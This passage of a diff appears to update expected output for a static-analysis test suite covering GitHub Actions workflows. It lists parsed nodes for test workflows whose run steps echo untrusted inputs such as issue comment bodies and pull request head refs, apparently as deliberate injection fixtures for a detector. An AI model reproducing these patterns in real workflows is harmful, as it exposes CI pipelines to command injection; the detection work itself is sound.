github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | allUsesNodes | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | @@ -93,12 +155,30 @@ jobUsesNodes | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | usesSteps -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | runStepChildren +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:7:11 | run | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:8:11 | run | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:10:11 | run | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:13:11 | run | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:16:11 | run | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:20:11 | run | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | @@ -112,6 +192,45 @@ runStepChildren | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | parentNodes +| .github/workflows/expression_nodes.yml:1:1:1:2 | on | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:7:11 | run | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | +| .github/workflows/expression_nodes.yml:8:9:8:11 | run | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:10:9:10:11 | run | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:13:9:13:11 | run | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:13:14:15:46 | > | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:16:9:16:11 | run | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:20:9:20:11 | run | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -124,6 +243,7 @@ parentNodes | .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | | .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | @@ -151,6 +271,7 @@ parentNodes | .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | | .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | @@ -160,17 +281,20 @@ parentNodes | .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | | .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | | .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | | .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | | .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:4:3:40:53 | job1: | | .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | Job: job2 | @@ -180,72 +304,154 @@ parentNodes | .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | cfgNodes +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:24:17:24:21 | "foo" | -| .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | dfNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | exprNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | usesIds | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | nodeLocations +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:19:8:49 | .github/workflows/test.yml@8:19:8:49 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | | .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:19:23:63 | .github/workflows/test.yml@23:19:23:63 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | @@ -349,4 +555,4 @@ calls | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | needs -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| 